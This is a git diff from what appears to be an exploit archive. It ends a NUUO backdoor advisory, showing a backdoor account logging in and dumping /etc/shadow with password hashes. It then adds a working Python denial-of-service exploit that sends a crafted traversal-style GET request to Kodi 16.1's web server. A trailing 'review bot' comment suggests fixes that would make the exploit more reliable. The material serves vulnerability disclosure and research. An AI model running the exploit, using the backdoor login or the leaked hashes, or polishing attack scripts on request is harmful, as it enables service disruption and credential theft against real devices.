file after backdoor was enabled: +----------------------------------------------------- + +root@nuuo:~# cat /etc/shadow +#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7::: +root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7::: +bin:*:14495:0:99999:7::: +daemon:*:14495:0:99999:7::: +adm:*:14495:0:99999:7::: +lp:*:14495:0:99999:7::: +sync:*:14495:0:99999:7::: +shutdown:*:14495:0:99999:7::: +halt:*:14495:0:99999:7::: +mail:*:14495:0:99999:7::: +uucp:*:14495:0:99999:7::: +operator:*:14495:0:99999:7::: 
+games:*:14495:0:99999:7::: +gopher:*:14495:0:99999:7::: +ftp:*:14495:0:99999:7::: +nobody:*:14495:0:99999:7::: +vcsa:!!:14564:::::: +sshd:!!:14564:::::: +guest::14564:0:99999:7::: +bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7::: + + +#4 +The backdoor account is able to read the /etc/shadow file: +----------------------------------------------------------- + +login as: bbb +bbb@10.0.0.17's password: +-sh-3.2$ id +Using fallback suid method +uid=1004(bbb) gid=1000(poweruser) groups=1000(poweruser) +-sh-3.2$ cat /etc/shadow +Using fallback suid method +#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7::: +root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7::: +bin:*:14495:0:99999:7::: +daemon:*:14495:0:99999:7::: +adm:*:14495:0:99999:7::: +lp:*:14495:0:99999:7::: +sync:*:14495:0:99999:7::: +shutdown:*:14495:0:99999:7::: +halt:*:14495:0:99999:7::: +mail:*:14495:0:99999:7::: +uucp:*:14495:0:99999:7::: +operator:*:14495:0:99999:7::: +games:*:14495:0:99999:7::: +gopher:*:14495:0:99999:7::: +ftp:*:14495:0:99999:7::: +nobody:*:14495:0:99999:7::: +vcsa:!!:14564:::::: +sshd:!!:14564:::::: +guest::14564:0:99999:7::: +bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7::: +-sh-3.2$ diff --git a/platforms/windows/dos/40208.py b/platforms/windows/dos/40208.py new file mode 100755 index 000000000..37a90ac96 --- /dev/null +++ b/platforms/windows/dos/40208.py 
@@ -0,0 +1,54 @@
+# Exploit Title: Kodi 16.1 Web Server Remote DoS
+# Date: 06/08/2016
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: https://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: https://kodi.tv/
+# Software Link: http://mirrors.kodi.tv/releases/win32/kodi-16.1-Jarvis.exe
+# Version: 16.1
+# Tested on: Windows 7 Family x64 (FR)
+# Category: DoS
+
+"""
+Disclosure Timeline:
+--------------------
+2016-08-02: Vulnerability discovered
+2016-08-04: Vendor contacted
+2016-08-04: Developper answered. Kodi v16 is End Of Life and will not be fixed.
+2016-08-06: Exploit published.
+
+
+Description :
+-------------
+A remote Denial Of Service exists in Kodi 16.1 (Jarvis) embedded web server when sending a specially crafted GET request.
+The web server is disabled by default.
+
+
+Instructions:
+-------------
+- Starts Kodi, and enable the web server in System, Services, Web server.
+- Run this exploit locally or from your remote attacking machine.
+"""
+
+import socket
+
+host = "192.168.135.129"
+port = 8080
+
+junk = '../' * 10
+buffer = "GET " + junk + " HTTP/1.1\r\n"
+buffer += "\r\n\r\n"
+
+try:
+ print "[*] Connecting to %s:%d" % (host, port)
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, port))
+
+ print "[*] Sending buffer... (%d bytes)" % len(buffer)
+ s.send(buffer)
+ s.close()
+
+ print "[*] Done."
+except:
+ print "[-] Error connecting"
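Review bot: The bare `except:` at the end of the script reports every failure as "Error connecting", including an error during `s.send` or a bug in the script itself, and the socket is not closed on that path. Catch `socket.error` and print the exception, release the socket in a `finally` (or a `with` block), and use `s.sendall(buffer)`, since `send` may write only part of the data. `buffer` shadows a Python 2 builtin, and the target is hard-coded instead of taken from `sys.argv` even though the header tells the reader to run it from a remote machine. The module docstring should also state that the request is a plain GET with a traversal-style path, since that is what a web-server log or IDS rule would key on when looking for this.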